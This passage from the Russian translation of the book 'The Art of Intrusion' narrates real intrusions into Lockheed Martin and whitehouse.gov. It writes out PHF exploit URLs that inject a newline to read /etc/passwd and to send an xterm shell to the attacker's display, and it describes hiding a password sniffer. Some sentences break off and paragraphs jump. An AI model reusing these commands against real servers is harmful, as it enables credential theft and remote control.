Искусство вторжения
Шрифт:
Через несколько дней группа смогла проникнуть в компьютерные системы, управляющие энергетической сетью и с помощью серии команд могла лишить часть страны электричества. «Если бы действия группы были реальными». — писал тогда журнал «Christian Science Monitor», «они могли бы разрушить коммуникационные системы Министерства обороны (вывести из строя большинство тихоокеанских подразделений) и получить доступ к компьютерным системам на борту военно-морских кораблей США»11 .
В моем личном послужном списке есть несколько побед над механизмами безопасности, которые
Члены Аль-Кайды и других террористических групп используют компьютеры при планировании своих террористических актов. Есть доказательства того, что и при планировании атак 9/11 террористы использовали Интернет.
Если даже Халиду Ибрагиму удалось получить какую-то информацию у кого-то из юных хакеров, ни один из них не сознается в этом. Если он действительно был связан с атаками на башни Всемирного торгового центра и Пентагон, то доказательств этому нет. Нет сведений и о том, когда он или кто-то из его подручных появятся опять на компьютерной сцене в поисках несмышленых помощников, которые испытывают непреодолимое желание «делать то, что тебе нельзя делать, лезть туда, куда тебе лезть нельзя, или идти туда, куда нельзя ходить, в поисках чего-нибудь действительно клевого». Таких помощников, которые могут считать поставленные перед ними задачи «крутыми».
Для молодых хакеров слабая безопасность остается непреодолимым соблазном. Хакеры, о которых идет речь в этой истории, вынуждены были признать, насколько опасно выполнять задания иностранных заказчиков по проникновению в секретные американские компьютерные сети. Можно только предполагать, сколько других «neOh» были завербованы нашими врагами.
Безопасность стала жизненно важным делом, поскольку мы живем в мире, населенном террористами.
АНАЛИЗ
neOh подробно рассказал нам, как он проник в компьютерную систему компании Lockheed Martin. Его рассказ является важным свидетельством, — как пример и для хакеров («Если в системе безопасности есть лазейка, то мы отыщем ее» — таков их лозунг), так и для служб компьютерной безопасности в любой организации.
Он быстро определил, что в компании Lockheed Martin используется собственный сервер доменных имен (DNS — Domain Name Server). DNS — это Интернет-протокол, который, например, транслирует имя сайта www.disney.com в 198.187.189.55 — адрес, который может использоваться для маршрутизации пакетов. neOh знал, что группа исследования безопасности в Польше опубликовала то, что хакеры называют «exploit» (подвигом или достижением) — программу, специально созданную для атаки одного конкретного уязвимого места в версии DNS, которую использовала компания Lockheed.
Компания использовала разновидность DNS-протокола под названием BIND (Berkeley Internet Name Domain). Польская группа обнаружила. что одна из версий BIND уязвима перед определенным типом атак (переполнение удаленного буфера)
После получения этих привилегий neOh организовал перехват паролей и электронной почты при помощи программы «вынюхивания», которая действует, как своеобразное подглядывающее компьютерное устройство. Любой посланный трафик эта программа перехватывает; обычно хакер пересылает перехваченную информацию туда, где ее невозможно найти. Чтобы спрятать координаты «нюхача», рассказывает neOh, он создал директорию без имени, тo есть «var/adm/…». При проверке системный администратор вполне мог и пропустить такую незаметную ссылку.
Подобная техника маскировки программ «вынюхивания» очень эффективна и совсем проста; для сокрытия следов хакерского вмешательства есть много более сложных методов.
Не успев найти пути проникновения в сеть Lockheed Martin для получения секретной информации компании, neOh переключился на другую задачу, поэтому секретные файлы остались нетронутыми,
При проникновении на сайт Белого Дома, как рассказывает Zyklon, он вначале запустил программу под названием CGI-сканер. которая сканирует систему на предмет поиска CGI-лазеек. Он обнаружил, что Интернет-сайт уязвим перед атаками, использующими «PHF-дырку», действие которой основано на программной ошибке, сделанной разработчиками в тексте PHF (телефонной книги).
PHF — это своеобразный интерфейс, который устанавливает соответствие между именем на входе и отыскивает соответствие ему на сервере. Программа вызывает функцию escapeshellcmd, которая должна проверять входные данные на наличие в них специальных знаков. Но программисты исключили из этого списка знаков знак перехода на новую строку. Именно это и может использовать умелый хакер, включив во входную информацию этот знак (ОхОа) в расшифрованном виде. Посыл строки с этим знаком превращает текст в команду для исполнения, написанную хакером.
Zyklon напечатал в своем браузере такой адрес:
http://www.whitehouse.gov/cgi- bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
После этого он смог получить доступ к файлу паролей для white-house.gov. Но он стремился получить полный контроль над сервером Белого Дома. Он знал, что скорее всего порты Х-сервера будут защищены специальным экраном, который помешает ему соединиться с любым из сервисов на whitehouse.gov. Вместо этого он опять использовал «PHF-дырку». напечатав:bin/phf?Qalias=x%Oaa/usr/X11R6/bin/xterm%20-ut%20-display%20zyklons.ip.adress:0.0
Это привело к посылке xterm с сервера Белого Дома на его компьютер, работающий на сервере X. Таким образом, вместо того, чтобы соединяться с whitehouse.gov, он дал команду системе Белого Дома соединиться с ним. (Это возможно только в том случае, когда защитный экран допускает исходящие соединения — именно такой случай и был реализован в данной ситуации).
Затем он использовал уязвимость перегрузки буфера в системной программе ufsrestore. По словам Zyklon, это позволило ему получить доступ к корневой директории whitehouse.gov, так же как и доступ к почтовому серверу Белого Дома и другим системам сети.